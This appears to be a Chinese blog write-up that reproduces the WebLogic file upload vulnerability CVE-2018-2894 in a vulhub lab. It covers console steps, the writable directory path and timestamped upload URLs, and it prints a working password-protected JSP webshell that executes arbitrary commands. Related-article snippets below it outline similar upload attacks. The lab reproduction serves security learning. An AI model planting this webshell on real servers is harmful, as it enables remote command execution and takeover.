weblogic任意文件上传漏洞复现(CVE-2018-2894)

最新推荐文章于 2025-03-27 19:44:29 发布
最新推荐文章于 2025-03-27 19:44:29 发布
阅读量933 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wcwdnmdnmd/article/details/128143673
版权

weblogic任意文件上传漏洞复现(CVE-2018-2894)

漏洞限制

  1. 需要登录
  2. 需要写权限

环境搭建

本次漏洞为了更真实的模拟实际环境,使用vulhub在vps上搭建。
首先vps防火墙开启7001端口,这是环境启动后的端口
搭建vulhub靶场的教程网上很多,也可以参考官网
搭建完成后使用sudo docker-compose up -d启动weblogic任意文件上传漏洞环境。(这里使用了另一个漏洞环境的启动截图(^_^))。
在这里插入图片描述
使用sudo docker-compose logs | grep password查看登录账号和密码。
在这里插入图片描述

漏洞复现

访问http://your-ip:7001/console并使用刚才得到的账号密码登录
在这里插入图片描述
访问base_domain
在这里插入图片描述
高级->启用web测试页
在这里插入图片描述
访问测试页面/ws_utc
在这里插入图片描述
发现存在限制,直接访问config.do页面
在这里插入图片描述
设置工作目录为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
指定工作目录的目的是为了写文件,所以需要指定可写目录为工作目录。
在安全界面上传webshell。
这里使用有回显带密码验证的webshell。

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

抓包得到时间戳。
在这里插入图片描述
拼接/ws_utc/css/config/keystore/[时间戳]_[文件名]并分别访问。
可写目录成功执行。
在这里插入图片描述
不可写目录虽然显示上传成功,但访问返回404。
在这里插入图片描述

使用工具

使用Upsploit工具进行上传测试。
抓包上传数据包
在这里插入图片描述
在这里插入图片描述
将上传数据包放入run test
在这里插入图片描述
在这里插入图片描述
上传成功,访问上传文件,成功弹窗。
在这里插入图片描述
还有其他上传方法,就不一一列举了,直接看结果。
在这里插入图片描述
可以看到上传的内容,为javascript语句。

HorizontCMS文件上传漏洞复现(CVE-2020-28693)
玄道的网安博客
12-18 862
简介 HorizontCMS是个人开发者的一个客户关系管理 Web 平台。 洞概述 该漏洞源于不受限制的文件上传,攻击者可利用该漏洞通过上传一个主题来通过zip文件上传PHP代码,并通过HTTP GET请求对主题< PHP文件名>执行PHP文件。 影响版本 HorizontCMS 1.0.0-beta 存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/ttimot24/HorizontCMS/tree/bootstrap-v4 安装教程可以参考官方教程
Weblogic 任意文件上传漏洞CVE-2018-2894复现
qq_53105813的博客
01-12 2000
Weblogic 任意文件上传漏洞CVE-2018-2894复现
文件上传漏洞复现
极客剑寮
02-22 2141
文件上传漏洞复现 文件上传漏洞复现笔记 预备知识 文件上传漏洞 WebShellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器...
分享几个CVE漏洞复现
最新发布
xnxqwzy的博客
03-27 673
对网站设置域名解析点击此处一个登录界面,发现系统版本,查找历史漏洞,发现一个文件上传RCE漏洞下载下来查看参考文章:https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE可以拿到shell,但是无法切换成交互模式换另一种方式,登录管理面板,密码为维吉尼亚解密密码成功登录,是管理员,点击设置查看进入后台,因为上面搜出来了文件上传RCE漏洞,所以找一找文件上传点发现此处,可以进行文件上传点击该处可以上传上传一个txt文件试试,上传成功。
Weblogic 任意文件上传漏洞复现
weixin_45711977的博客
07-12 985
Weblogic 任意文件上传漏洞复现
文件上传漏洞(upload-labs)复现(1~9)
net的博客
02-23 1270
在上述配置中,FilesMatch表示匹配4.png的文件,当该文件名匹配成功后,SetHandler表示将该文件作为PHP类型的文件来进行处置。复制文件上传的路径,请求 GET /upload/upload/20200304.php5?④复制文件上传的路径,请求GET /upload/upload/webshell.php?①分析源码,黑名单包括了几乎所有php后缀文件,但是并没有屏蔽后缀为.htaccess的文件上传。②上传png后缀的webshell,代理抓包,修改上传的文件后缀 (推荐);
WebLogic 任意文件上传CVE-2018-2894漏洞复现
weixin_44253823的博客
12-09 231
Weblogic任意文件两种上传漏洞CVE-2018-2894漏洞介绍 WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do,利用该漏洞,可以上传任意jsp、php等文件,并获取服务器权限。 受影响版本 weblogic 10.3.6.0、weblogic 12.1.3.0...
Weblogic任意文件上传漏洞CVE-2018-2894复现
君莫hacker的博客
09-13 1361
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1.开启运行靶机2. 开启Web Service Test Page3. 访问url, 设置Work Home Dir4. 上传木马5. 访问上传的木马文件,执行命令0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 Weblogic Web Service Test Page中一处任意文件上传漏洞Web Service Test Page 在"生产模式"下默认不开启,所以该漏洞有一定限制。 漏洞编号 CVE-2018-2894 受影响
Weblogic 任意文件上传漏洞CVE-2018-2894
m0_53603468的博客
12-30 731
文章目录概述weblogic漏洞复现:环境搭建漏洞复现总结 概述 今天做的是Weblogic 任意文件上传漏洞CVE-2018-2894) Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。 weblogic WebLogic是美国Oracle公司出品的一个application serv.
weblogic CVE-2018-2894
2301_76467680的博客
07-03 94
点击`base_domain`的配置,在“高级”中开启“启用 Web 服。访问上传webshell。新建并上传jsp文件。
复现文件上传漏洞
weixin_69863399的博客
03-15 883
通过代码我们可以看出该用于限制文件过滤的函数是通过JavaScript运行的,所以我们可以通过浏览器的设置-->隐私和安全--->找到Javascript将其关掉。将下载好的upload-labs的压缩包,将此压缩包解压到WWW中,并将名称修改为upload,同时也要在upload文件中建立一个upload的文件。此时,我们会发现显示源码什么的都是点不动的,但是选择文件是可以点的动的,所以此时我们可以上传文件,会发现上传成功。”,然后进行上传.htaccess文件,但是该文件和.jpg要在同一个文件夹下。
upload文件上传漏洞复现
weixin_71398630的博客
03-14 1277
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
Weblogic漏洞CVE-2018-2894
qq_68186313的博客
08-06 327
Weblogic Web Service Test Page中⼀处任意⽂件上传漏洞Web Service Test Page 在 "⽣产模式" 下默认不开启,所以该漏洞有⼀定限制。http://IP:port/ws_utc/css/config/keystore/1688302924206_peak.jsp 时间戳_⽂件名.jsp。4、点击保存,进入config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录,访问这个⽬ 录是⽆需权限的。6、右键审查元素,找到时间戳,拼接访问。
apache 文件上传 (CVE-2017-15715)漏洞复现
weixin_42675091的博客
09-02 2595
apache 文件上传 (CVE-2017-15715)漏洞复现
weblogic漏洞——CVE-2018-2894
weixin_57379923的博客
08-12 559
https://ip:7001/ws_utc/css/config/keystore/ 时间戳_shell.jsp。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。作 者:PeiyuJue。
DVWA之文件上传漏洞复现
weixin_43263451的博客
07-21 1246
文件上传漏洞文件上传Web 应用的必备功能之一,比如上传头像显示个性化、上传附件共享文件、上传脚本更新网站。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件、exe 程序等,这就造成了文件上传漏洞。 正常文件上传抓包分析: 基本原理文件上传漏洞的成因,一方面服务器配置不当会导致任意文件上传; 另一方面,Web 应用开放了文件上传功能,并且对上传的文件没...
4、文件上传漏洞复现
sigali的博客
03-16 306
4、文件上传漏洞复现 4.1、实验步骤 1) 部署网站 2) 文件上传功能测试 3) 上传漏洞攻击 (1) 设置代理 (2) MIME上传漏洞攻击 (3) 0x00截断路径上传漏洞攻击
漏洞复现-文件上传
hackzkaq的博客
11-06 341
在某次对某单位进行渗透测试时,遇到一个上传点,网站是java写的,但是上传jsp和jspx时会被waf拦截,但由于上传路径可控,经过不懈努力最终成果拿到shell,于是写这篇文章记录一下。目录中可以用来放置JSP的静态资源,在servlet3.0协议规范中,包含在jar文件 /META-INFO/resources/ 路径下的资源是可以直接访问的。目录通常是的一个特定目录,它用于存放与应用程序配置、安全性和资源管理相关的文件和目录,并且该目录下的资源文件无法直接通过浏览器访问。
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
推荐使用的镜像是vulhub/weblogic:12.2.1.3-2018,通过命令`sudo docker pull vulhub/weblogic:12.2.1.3-2018`下载镜像,然后运行`sudo docker run -p 7001:7001 -p 8055:8055 vulhub/weblogic:12.2.1.3-2018`。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值